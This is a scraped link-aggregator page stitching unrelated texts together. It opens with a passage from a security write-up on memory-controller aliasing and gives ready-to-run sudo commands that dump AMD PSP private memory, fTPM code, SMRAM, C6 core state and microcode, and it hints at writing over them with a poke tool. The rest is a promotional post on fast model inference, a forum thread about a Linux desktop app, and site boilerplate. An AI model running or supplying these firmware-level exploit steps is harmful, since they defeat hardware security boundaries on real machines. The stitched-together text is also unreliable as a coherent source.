┌ ┐ ┌ ┐ ┌ ┐ │ 1 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 │ │ 0 │ │ 0 │ │ 0 1 0 0 0 0 0 0 0 0 0 0 0 0 0 0 │ │ 0 │ │ 0 │ │ 0 0 1 0 0 1 0 0 1 0 0 0 0 0 0 0 │ │ 0 │ │ 1 │ │ 0 0 0 1 0 0 0 0 0 0 0 0 0 0 0 0 │ │ 0 │ │ 0 │ │ 0 0 0 0 0 0 0 1 0 0 0 0 0 0 0 0 │ │ 0 │ │ 1 │ │ 0 0 0 0 0 1 0 0 0 0 0 0 0 0 0 0 │ │ 1 │ │ 1 │ │ 0 0 0 0 0 0 0 0 0 1 0 0 0 0 0 0 │ │ 0 │ │ 1 │ │ 0 0 0 0 1 0 0 0 0 0 1 0 0 0 0 1 │ · │ 1 │ = │ 0 │ │ 0 0 0 0 0 0 0 0 1 0 0 0 0 0 0 0 │ │ 0 │ │ 0 │ │ 0 0 0 0 0 0 1 0 0 0 0 0 0 0 0 0 │ │ 1 │ │ 0 │ │ 0 0 0 0 0 0 0 0 0 0 1 0 0 0 0 0 │ │ 0 │ │ 0 │ │ 0 0 0 0 0 0 0 0 0 0 0 1 0 0 0 0 │ │ 0 │ │ 0 │ │ 0 0 0 0 0 0 0 0 0 0 0 0 1 0 0 0 │ │ 0 │ │ 0 │ │ 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 1 │ │ 0 │ │ 0 │ │ 0 0 0 0 0 0 0 0 0 0 0 0 0 0 1 0 │ │ 0 │ │ 0 │ │ 0 0 0 0 0 0 0 0 0 0 0 0 0 1 0 0 │ │ 0 │ │ 0 │ └ ┘ └ ┘ └ ┘ M_attacker⁻¹ ∘ M_firmware tar­get alias

Feeding alias pairs to z3 one at a time lets us watch the SMT solver de­ci­pher the mem­ory scram­bling in real time, as shown in the open­ing im­age.

The solved trans­form is a rosetta stone: any tar­get ad­dress in the co­her­ent view maps to an alias that reaches the same DRAM in the spaghet­ti­fied view. To reach any pro­tected mem­ory, take an ad­dress we can’t nor­mally touch — PSP pri­vate mem­ory, SMRAM, the C6 idle-state — and run it through the trans­form to get its alias. Then rewire the DCT with xor dword [0xf80c2094], 0x00400000, read or write the alias, and switch back with a sec­ond xor. The alias’s path through the *p pipeline never hits a fence the plat­form built for the co­her­ent view — un­re­stricted ac­cess to any­thing in DRAM.

In the end, every­thing so care­fully walled off — PSP pri­vate mem­ory, SMRAM, the C6 idle-state, in­ac­ces­si­ble from the OS, ring-0, some­times the CPU it­self — is still sit­ting in the same DRAM ca­pac­i­tors. But the locks were built around the co­her­ent view of mem­ory, and do noth­ing against a spaghet­ti­fied alias reach­ing the same cell.

Flip one bit in the fi­nal level of the *p pipeline, and we’ve un­locked every­thing.

Quick start: un­lock your Platform Security Processor

Tamper with your PSP, see what hap­pens.

Tamper with your PSP, see what hap­pens.

The fTPM runs on the PSPs own ARM core, in a DRAM carve­out right past the vis­i­ble top-of-mem­ory. Reach it by alias­ing an OS-visible phys­i­cal ad­dress onto it, pull the bytes out, dis­as­sem­ble.

# Bail out early on plat­forms this was never tested on. ./userspace/platform_check || exit 1

# Resolve the PSP DRAM carve­out — sets PSP_BASE / PSP_SIZE (0x7f800000 / # 0x800000 on the test box). Swap 2x4gb for whichever data/​maps/ pre­fix # matches your DIMMs; one –map per saved map. eval $(sudo ./userspace/dram_carveouts –region psp)” sudo ./userspace/dram_dump –protected-pa $PSP_BASE –length $PSP_SIZE \ $(printf — ‘–map %s data/​maps/​2x4gb_*.map) > psp.bin

# The PSP is an ARM core, so dis­as­sem­ble as Thumb-2. Carve crAmd_­Mod­Exp # (0x64 bytes at PSP_BASE+0x19d4) straight out of the cap­tured im­age. ob­j­dump -b bi­nary -m ar­mv7 -M force-thumb –adjust-vma=$PSP_BASE \ –start-address=$((PSP_BASE + 0x19d4)) \ –stop-address=$((PSP_BASE + 0x19d4 + 0x64)) \ -D psp.bin

; crAmd_­Mod­Exp — the fTP­M’s RSA mod­u­lar-ex­po­nen­ti­a­tion rou­tine, re­cov­ered in­tact ; from the PSPs pri­vate DRAM. 7f8019d4: b5f0 push {r4, r5, r6, r7, lr} 7f8019d6: b0e5 sub sp, #404 7f8019de: 2280 movs r2, #128  ; 1024-bit operand 7f8019e4: f7fe ffef bl 0x7f8009c6  ; im­port base (aA) 7f8019ee: a0eb adr r0, 0x7f801d9c  ; crAmd_ModExp aA failed, sta­tus = 0x%x” 7f8019f8: f7fe ffe5 bl 0x7f8009c6  ; im­port ex­po­nent (aB) 7f801a02: a0f0 adr r0, 0x7f801dc4  ; crAmd_ModExp aB failed sta­tus = 0x%x” 7f801a18: f000 fdd4 bl 0x7f8025c4  ; the mod­exp it­self 7f801a20: a0f2 adr r0, 0x7f801dec  ; crAmd_ModExp failed ret=0x%08x, exit” 7f801a22: f000 fef5 bl 0x7f802810  ; log er­ror 7f801a2e: f001 e92a blx 0x7f802c84  ; ex­port re­sult 7f801a36: bdf0 pop {r4, r5, r6, r7, pc}

That’s the PSPs RSA en­gine — the mod­exp be­hind every fTPM sig­na­ture, and be­hind the Miller-Rabin tests that mint its keys — lifted out of mem­ory the PSP is sup­posed to own alone, fenced off at the mem­ory con­troller, opaque even to ring-0. Modify as you see fit.

Quick start: un­lock System Management Mode

Read what SMM hides.

Read what SMM hides.

The SMI han­dler en­try vec­tor lives at SMBASE + 0x8000. SMBASE is in MSR 0xc0010111. Read it, pull the bytes through the alias map, and pipe them straight into a dis­as­sem­bler:

# Bail out early on plat­forms this was never tested on. ./userspace/platform_check || exit 1

sudo mod­probe msr

# SMBASE is per-core; core 0′s lives in MSR 0xc0010111. SMM_BASE=0x$(sudo rdmsr -p 0 0xc0010111) SMI_ENTRY=$(( SMM_BASE + 0x8000 ))

# Dump the en­try vec­tor through the alias map and dis­as­sem­ble on the fly. # SMM starts in real mode, so ndis­asm gets -b 16. One –map per saved map; # printf ex­pands the glob into a –map for each (at_swizzle, at_bankswap) combo. sudo ./userspace/dram_dump –protected-pa $SMI_ENTRY –length 0x40 \ $(printf — ‘–map %s data/​maps/​2x4gb_*.map) | ndis­asm -b 16 -

; SMI en­try stub — the first thing a core ex­e­cutes when en­ter­ing the ; ul­tra-priv­i­leged System Management Mode. mov si,0x8148  ; SI -> GDT pointer parked at SMBASE+0x8148, just past this stub o32 lgdt [cs:si]  ; load it (o32 -> full 32-bit base, not real mod­e’s 24-bit form) mov eax,0x3  ; CR0.PE | CR0.MP mov cr0,eax  ; flip the core into pro­tected mode jmp short 0x14  ; near jump to se­ri­al­ize and flush the prefetch queue post-switch mov ax,0x18  ; GDT se­lec­tor 0x18 -> flat data seg­ment mov ss,ax  ; re­load SS for pro­tected mode mov eax,0x6e­fe2ff8  ; SMM stack top mov esp,eax  ; in­stall the SMM stack o32 push byte +0x10  ; far-re­turn frame: CS = code se­lec­tor 0x10 mov ecx,0x­c0010111  ; MSR SMM_BASE rdmsr  ; EAX = this core’s SMBASE mov ebx,eax  ; stash SMBASE add eax,0x803a  ; EAX = SMBASE+0x803a, the 32-bit han­dler en­try push eax  ; far-re­turn frame: EIP = SMBASE+0x803a retfd  ; far-re­turn into 0x10:SMBASE+0x803a — the SMI han­dler proper

Those in­struc­tions run in ring -2, the most priv­i­leged con­text on the CPU, out of mem­ory the chipset is sup­posed to make un­read­able. SMRAM locked” turns out to be a po­lite sug­ges­tion when we can talk to the DRAM con­troller di­rectly.

Swap 2x4gb for whichever pre­fix in data/​maps/ matches your in­stalled DIMMs (sudo dmide­code -t mem­ory). If your topol­ogy is­n’t there, run analy­sis/​gath­er_aliases.py then analy­sis/​un­spaghet­tify.py to bake your own.

Quick start: un­lock C6 DRAM

I have no idea what’s in here and have never seen it dis­cussed, likely in­ter­nal CPU reg­is­ters. Have fun.

I have no idea what’s in here and have never seen it dis­cussed, likely in­ter­nal CPU reg­is­ters. Have fun.

When the cores power-gate into C6, each one’s full x86 ar­chi­tec­tural con­text is stashed here for re­store.

./userspace/platform_check || exit 1

# Resolve the C6 stash — sets CC6_BASE / CC6_SIZE (0x7f000000 / 0x800000 on the # test box). Each idle core’s state lives in a 16 KiB save area; four cores # here, at CC6_BASE + {0, 0x4000, 0x8000, 0xc000}. eval $(sudo ./userspace/dram_carveouts –region cc6)” sudo ./userspace/dram_dump –protected-pa $CC6_BASE –length 0x10000 \ $(printf — ‘–map %s data/​maps/​2x4gb_*.map) > cc6.bin

# For ex­am­ple, on this plat­form IA32_APIC_BASE sits at +0x9b8 in each area. # Read it from all four cores straight out of the stash: for c in 0 1 2 3; do printf core %d $c hex­dump -C -s $(( c*0x4000 + 0x9b8 )) -n 8 cc6.bin | head -1 done

core 0 000009b8 00 09 e0 fe 00 00 00 00 |……..| <- 0xfee00900 en­abled, BSP bit set core 1 000049b8 00 08 e0 fe 00 00 00 00 |……..| <- 0xfee00800 ap­pli­ca­tion proces­sor core 2 000089b8 00 08 e0 fe 00 00 00 00 |……..| <- 0xfee00800 ap­pli­ca­tion proces­sor core 3 0000c9b8 00 08 e0 fe 00 00 00 00 |……..| <- 0xfee00800 ap­pli­ca­tion proces­sor

One core with the BSP bit set, three with­out — the boot proces­sor and its three APs, caught mid-idle with their reg­is­ter state ly­ing in the open.

The more you poke around, the more CPU reg­is­ters you’ll start to find:

Of course, those reg­is­ters are all ac­ces­si­ble from ring-0 any­way. The fun part is in all the other CPU state sit­ting there — pok­ing the in­ter­nal CPU reg­is­ters ring-0 can’t reach.

Quick start: un­lock your CPU mi­croc­ode

What could go wrong?

What could go wrong?

When a core drops into C6 its mi­croc­ode patch RAM — volatile SRAM — goes dark with the rest of the core. So the C6 stash keeps the loaded patch in DRAM and re-seeds it on wake. That copy sits at +0x1800 in each save area, and the alias reaches it like any other byte.

Grab the mi­croc­ode copy the CPU stashed in fenced DRAM:

./userspace/platform_check || exit 1 eval $(sudo ./userspace/dram_carveouts –region cc6)”

# page 1 of core 0′s save area is the live mi­croc­ode patch body sudo ./userspace/dram_dump –protected-pa $((CC6_BASE + 0x1800)) –length 0x5f0 \ $(printf — ‘–map %s data/​maps/​2x4gb_*.map) > ucode_ram.bin

Match it against known patches:

# did we find it? python3 - <<‘EOF’ ram = open(“ucode_ram.bin”, rb”).read() chunks = [ram[i:i+16] for i in range(0, len(ram)-16, 16) if ram[i:i+16].count(0) <= 12] for fam in (15, 16, 17, 19): uc = open(f”/​lib/​firmware/​amd-ucode/​mi­croc­ode_amd_­fam{fam}h.bin”, rb”).read() print(f”fam{fam}h: {sum(c in uc for c in chunks):2}/{​len(chunks)} chunks match”) EOF

This is a good sign:

fam15h: 0/94 chunks match fam16h: 68/94 chunks match <- the mi­croc­ode the core is run­ning fam17h: 0/94 chunks match fam19h: 0/94 chunks match

Extract the ucode tri­ads:

od -Ax -tx1 -w20 ucode_ram.bin

000000 c1 df db eb 28 ac 06 00 f5 ff ff 00 e1 1d 0a f9 ff ef ff 2a 000014 e0 8f 2a c7 ff bf 07 00 ff ff bf 2a e0 1f e0 e7 78 df 7d c0 000028 ff ff cf bf 4c 20 06 00 cf 53 39 00 c0 df db eb fe ff ff 27 […] 000370 e1 1f c0 bf ff bf 07 00 ff 81 7f 00 e1 1f c0 bf ff 81 7f 00 * 0005f0

And there it is, dis­tinct uops up top, NOP padding re­peat­ing be­low.

From there, dram_­dump has a sib­ling tool, dram_poke. The same alias that read the patch can write it — and this copy is the one the core re­loads com­ing out of idle.

What you do next is up to your imag­i­na­tion.

Accelerating GPT-5.6 Sol Ultrafast with OpenAI

www.cerebras.ai

Today, Cerebras and OpenAI are shar­ing an early look at Ultrafast Mode, a new ser­vice tier launch­ing first in the OpenAI API and pow­ered by Cerebras. Ultrafast is avail­able ini­tially to a se­lect group of cus­tomers, with ac­cess ex­pand­ing over time. Cerebras pow­ers GPT-5.6 Sol on Ultrafast mode, de­liv­er­ing up to 750 out­put to­kens per sec­ond and with­out any qual­ity com­pro­mise, al­low­ing Sol Ultrafast to ac­cel­er­ate your most time-sen­si­tive, mis­sion-crit­i­cal work.

Frontier Intelligence at Unprecedented Speed

AI builders have al­ways needed to choose be­tween speed and in­tel­li­gence. As mod­els scale up in size and in­tel­li­gence, they in­cur higher com­pu­ta­tional and data move­ment costs, slow­ing down re­sponse times. Users of­ten need to wait for high-qual­ity re­sults or ac­cept in­fe­rior re­sults within a shorter time­frame.

GPT-5.6 Sol Ultrafast re­solves this trade­off, bring­ing fron­tier in­tel­li­gence to prod­ucts and work­flows where every sec­ond mat­ters. Compared with out­put speeds re­ported by Artificial Analysis GPT-5.6 Sol on Ultrafast mode runs 11x faster than Fable 5, and 5x faster than Opus 4.8 on Fast mode.

At Cerebras, we put Ultrafast to the test by run­ning it head-to-head with pop­u­lar mod­els on Humanity’s Last Exam. HLE is a chal­leng­ing model bench­mark that con­sists of 2,500 ques­tions typ­i­cally an­swer­able only by those hold­ing PhDs in fields such as chem­istry, eco­nom­ics, and lit­er­a­ture.

In our eval­u­a­tions, GPT-5.6 Sol on Ultrafast mode an­swered all 2,500 HLE ques­tions in 11 hours and 11 min­utes. Claude Fable 5 needed 78 hours and 27 min­utes, more than three days of con­tin­u­ous com­pute, to ar­rive at the same con­clu­sions. In other words, Ultrafast worked through the fron­tier of hu­man knowl­edge in a sin­gle work­ing day, achiev­ing com­pa­ra­ble ac­cu­racy nearly faster.

Benchmarking was per­formed by Cerebras us­ing GPT 5.6 Sol Ultrafast with Codex on xhigh rea­son­ing on July 10 and Claude Fable 5 with Claude Code on xhigh rea­son­ing on July 13 – 15.

As model ca­pa­bil­i­ties con­tinue to ad­vance, the range of ap­pli­ca­tions for fast in­fer­ence ex­pands. GPT-5.6 Sol is OpenAI’s best model yet for le­gal briefs, fi­nan­cial mod­els, and en­gi­neer­ing re­ports. On GDP-Val, a bench­mark for eco­nom­i­cally valu­able knowl­edge work tasks, Ultrafast de­liv­ered a 5.6x end-to-end speedup with no qual­ity degra­da­tion, show­ing how faster in­fer­ence can ac­cel­er­ate eco­nom­i­cally valu­able work.

Benchmarking was per­formed by Cerebras on July 31 2026 us­ing GPT 5.6 Sol and GPT 5.6 Sol Ultrafast on medium rea­son­ing within Codex.

High-Speed Intelligence Powers High-Stakes Work

Faster in­tel­li­gence changes what’s pos­si­ble for in­di­vid­u­als and or­ga­ni­za­tions. With Ultrafast, you can now put agents on the crit­i­cal path of prob­lems where every sec­ond counts.

With GPT-5.6 Sol Ultrafast, Cerebras en­ables AI that keeps up with how you think, code, and col­lab­o­rate. We’re ex­cited to see how work­flows and ap­pli­ca­tions are trans­formed by Ultrafast in­fer­ence.”

Rohan Varma

Product at OpenAI

Ultrafast is a per­sis­tent edge for or­ga­ni­za­tions us­ing fron­tier AI to quickly re­spond to in­com­ing in­for­ma­tion. Companies op­er­at­ing web ser­vices can lever­age Ultrafast to root-cause and ad­dress pro­duc­tion out­ages, pre­serv­ing cus­tomer trust, pre­vent­ing lost rev­enue, and sav­ing down­time min­utes against their SLAs. And in ad­ver­sar­ial, high stakes cy­ber­at­tacks, Ultrafast is an in­valu­able tool for se­cu­rity teams who must quickly de­tect and re­spond to bad ac­tors to con­tain cat­a­strophic losses.

More broadly, Ultrafast en­ables en­tirely new modes of work­ing with agents, it de­liv­ers real-time in­sights and up­dates, so you don’t have to con­text-switch across mul­ti­ple par­al­lel ses­sions to get the most out of your agents.

Whereas for­merly I might have to wait a cou­ple min­utes for a task to fin­ish, it now fin­ishes for me be­fore I even have the op­por­tu­nity to con­text-switch. It makes me way more pro­duc­tive.”

Jeffrey Wang

OpenAI Researcher

With Ultrafast, re­searchers and en­gi­neers can re­serve their at­ten­tion for go­ing deep on se­lect prob­lems that mat­ter most, while con­tin­u­ing to use Standard pro­cess­ing for par­al­leliz­ing com­mod­ity tasks. Cerebras is ex­cited to power the next wave of AI in­no­va­tion, rais­ing the ceil­ing for what in­di­vid­u­als and or­ga­ni­za­tions can ac­com­plish with re­spon­sive AI.

Breakneck Speed is Enabled by Breakthrough Innovation

GPT-5.6 Sol on Ultrafast mode is pow­ered by Cerebras’ rev­o­lu­tion­ary Wafer-Scale Engine ar­chi­tec­ture, pur­pose-built for fron­tier AI work­loads. Fast fron­tier in­fer­ence is a data move­ment prob­lem: on GPUs, in­fer­ence on large mod­els is bot­tle­necked by mem­ory band­width, as model weights must be re­peat­edly trans­ferred be­tween on-chip mem­ory and off-chip stor­age to gen­er­ate suc­ces­sive to­kens within a model re­sponse.

Cerebras takes a con­trar­ian ap­proach to elim­i­nat­ing this in­ef­fi­cient data move­ment: we pack 44 GB of SRAM on each wafer-sized chip. Weights stay on-chip, and to­kens flow un­in­ter­rupted through model lay­ers pipelined across wafers. This tech­ni­cal ap­proach scales smoothly with model size, paving the way for a con­tin­ued speed ad­van­tage on fu­ture fron­tier mod­els.

Ultrafast: Now in Limited Preview

GPT-5.6 Sol on Ultrafast mode is avail­able in a lim­ited pre­view to­day to a se­lect group of cus­tomers. Access will ex­pand as ca­pac­ity grows. Sign up for up­dates.

Codex in ChatGPT desktop app for Linux is now in preview 🐧

community.openai.com

August 11, 2026, 5:52pm

1

Linux users, this one’s for you!

Your browser does not sup­port HTML video.

ChatGPT desk­top app for Linux is now avail­able in pre­view, bring­ing ChatGPT, Work, and Codex to­gether in one na­tive desk­top ex­pe­ri­ence.

Currently sup­ported:

Ubuntu 24.04 LTS and 26.04 LTS

Debian 13

Fedora 43 and 44

x64 and ARM64 ar­chi­tec­tures

.deb and .rpm pack­ages

The desk­top app is de­signed as a work­space for man­ag­ing pro­jects, work­ing with files, us­ing browser work­flows, and run­ning Codex along­side ChatGPT.

Download now

You can learn more about the desk­top ex­pe­ri­ence in the of­fi­cial ChatGPT desk­top app doc­u­men­ta­tion.

Has any­one in­stalled the Linux pre­view yet? Please use this topic to share your feed­back and ex­pe­ri­ence.

oli.vier

August 11, 2026, 6:39pm

5

That’s fan­tas­tic! Do we have a fea­ture sheet any­where, to com­pare the Windows vs. Linux ver­sions?

Why is the web­site set up to only al­low you to see a down­load but­ton for the OS you’re on in many places, while other places have a but­ton for Windows and MacOS re­gard­less. There is so much con­ti­nu­ity er­rors on the site is su­per frus­trat­ing some­times to nav­i­gate. Its not do­ing any­one favours to hide down­load op­tions and its a lit­tle ironic this baby-method is used when youre lit­er­ally talk­ing about some­one us­ing a very pow­er­ful AI.

They are go­ing to gen­er­ally have enough IQ points to click their OS. As it stands i can­not down­load the linux ver­sion on win­dows and take it to my vm. I HAVE to do it via the vm first. Why is this ar­bi­trary lim­i­ta­tion im­ple­mented INCONSISTANTLY.

Neoony

August 11, 2026, 7:31pm

7

sps

August 11, 2026, 8:09pm

9

Welcome to the com­mu­nity @oli.vier

A com­par­i­son does­n’t ex­ist as of writ­ing this, but here’s some anec­do­tal in­for­ma­tion:

oli.vier

August 11, 2026, 8:27pm

10

Hah! I had missed it, thanks!

So Tibo is say­ing it’s pretty much par­ity in terms of fea­tures

oli.vier

August 11, 2026, 8:31pm

11

That’s pretty stan­dard stuff, tbh.

Its stan­dard to be in­con­sis­tent about when and where you post sep­a­rate down­loads?

Neoony

August 11, 2026, 9:29pm

13

Also seems to work in WSL Ubuntu 24.04 with WSLg in Windows

suika

August 12, 2026, 4:54am

14

I in­stalled the new Linux ChatGPT/Codex desk­top app from the of­fi­cial x64 RPM and en­coun­tered a Japanese IME is­sue on Fedora KDE.

Environment

Fedora 44 x86_64

KDE Plasma / Wayland

Fcitx 5

Japanese in­put method

Official ChatGPT/Codex Linux RPM

Issue

When ChatGPT is launched nor­mally from the KDE ap­pli­ca­tion menu, I can­not switch to Japanese in­put in­side the mes­sage com­poser.

Japanese in­put works nor­mally in na­tive KDE ap­pli­ca­tions such as KWrite.

I have en­coun­tered a sim­i­lar IME com­pat­i­bil­ity is­sue with an­other Chromium/Electron-based ap­pli­ca­tion, Obsidian, on the same Fedora/KDE/Wayland en­vi­ron­ment. In that case, I ul­ti­mately had to run Obsidian through XWayland to get Fcitx Japanese in­put work­ing re­li­ably.

Because of that, I ini­tially sus­pected that ChatGPT might re­quire the same XWayland workaround.

However, ChatGPT/Codex can be fixed with­out falling back to XWayland.

Wayland-native workaround

Launching ChatGPT with:

chat­gpt \ –enable-features=UseOzonePlatform \ –ozone-platform=wayland \ –enable-wayland-ime

im­me­di­ately en­ables Japanese in­put in the mes­sage com­poser.

So, un­like the workaround I needed for Obsidian, ChatGPT can re­main Wayland-native. It ap­pears that ex­plic­itly en­abling Wayland IME sup­port is suf­fi­cient.

I then copied the ChatGPT .desktop file to:

~/.local/share/applications/

and changed its Exec= line to:

Exec=chatgpt –enable-features=UseOzonePlatform –ozone-platform=wayland –enable-wayland-ime %U

After run­ning:

kbuildsy­co­ca6

I can now launch ChatGPT nor­mally from the KDE ap­pli­ca­tion menu and switch to Japanese in­put suc­cess­fully.

Summary

There seem to be re­cur­ring IME com­pat­i­bil­ity is­sues with some Chromium/Electron-style ap­pli­ca­tions on Fedora + KDE Plasma + Wayland + Fcitx.

In this case, how­ever, ChatGPT/Codex does not need an XWayland fall­back. Enabling Wayland IME sup­port ex­plic­itly is enough:

–enable-features=UseOzonePlatform –ozone-platform=wayland –enable-wayland-ime

This makes me won­der whether these op­tions, par­tic­u­larly –enable-wayland-ime, could be en­abled by de­fault in the Linux desk­top app where ap­pro­pri­ate.

Since the Linux app has just en­tered pre­view, I wanted to share the re­pro­duc­tion de­tails and con­firmed Wayland-native workaround.

Thanks for con­firm­ing this with Japanese IME. I re­ported the same is­sue ear­lier with Korean Fcitx5 on EndeavourOS + KDE Wayland, and –enable-wayland-ime fixes it for me as well. So this seems re­pro­ducible across at least Korean and Japanese Fcitx5 in­put meth­ods, not just a sin­gle dis­tro/​setup.

Are you re­ally sure that af­ter you change it like this, it will use Wayland? I changed it once be­fore and used Btop, but it still showed up as x11.

The main­stream ap­proach should be to au­to­mat­i­cally iden­tify whether it is X11 or Wayland. I don’t un­der­stand why my sys­tem ( Fedora 44 GNOME), which is Wayland, is falling back to run­ning on X11, and I have a 4K mon­i­tor, so the dis­play is ter­ri­ble.

suika

August 12, 2026, 7:27am

17

Thanks — that is a good point.

In my case, the im­por­tant part was that adding:

–enable-features=UseOzonePlatform \ –ozone-platform=wayland \ –enable-wayland-ime

made Fcitx Japanese in­put work with­out hav­ing to force XWayland.

To ver­ify the ac­tual back­end, I would check the run­ning process rather than rely only on the launcher con­fig­u­ra­tion, for ex­am­ple:

ps -ef | grep -i [c]hatgpt’

and look for –ozone-platform=wayland on the main/​ren­derer processes.

So I agree that ide­ally the app should au­to­mat­i­cally de­tect the cur­rent ses­sion and use Wayland when run­ning un­der Wayland, rather than silently falling back to X11.

Your Fedora 44 GNOME re­sult is es­pe­cially in­ter­est­ing be­cause my en­vi­ron­ment is Fedora 44 + KDE Plasma + Wayland. It may be worth com­par­ing GNOME and KDE be­hav­ior here.

Also, the 4K scal­ing is­sue is an­other good rea­son for the app to pre­fer na­tive Wayland where pos­si­ble.

yakuwavu

August 12, 2026, 8:21am

18

When be­ing rapidly dragged, the pet fre­quently flick­ers and jumps around er­rat­i­cally.

How much RAM does it use? Thanks.

Finally, the Linux ver­sion is here, great job, team!

Quick feed­back though: the biggest fric­tion for me is that, Codex CLI pro­jects on the same ma­chine DON’T show up in the Desktop ap­p’s pro­ject list.

Gloomberb

gloom.sh

Research com­pa­nies

Quotes, charts, fi­nan­cials, fil­ings, hold­ers, in­sid­ers, op­tions, an­a­lyst rat­ings, events, and rel­a­tive val­u­a­tion.

Follow mar­kets

Ranked sto­ries, break­ing news, sec­tor feeds, global in­dices, FX, macro events, yield curves, movers, and sen­ti­ment.

Run a work­space

Portfolios, watch­lists, bro­ker con­nec­tions, alerts, notes, AI screens, pre­dic­tion mar­kets, and Gloom Cloud chat.

Attention Required! | Cloudflare

tradersunion.com

Why have I been blocked?

This web­site is us­ing a se­cu­rity ser­vice to pro­tect it­self from on­line at­tacks. The ac­tion you just per­formed trig­gered the se­cu­rity so­lu­tion. There are sev­eral ac­tions that could trig­ger this block in­clud­ing sub­mit­ting a cer­tain word or phrase, a SQL com­mand or mal­formed data.

What can I do to re­solve this?

You can email the site owner to let them know you were blocked. Please in­clude what you were do­ing when this page came up and the Cloudflare Ray ID found at the bot­tom of this page.

z.ai

To add this web app to your iOS home screen tap the share button and select "Add to the Home Screen".

10HN is also available as an iOS App

If you visit 10HN only rarely, check out the the best articles from the past week.

Visit pancik.com for more.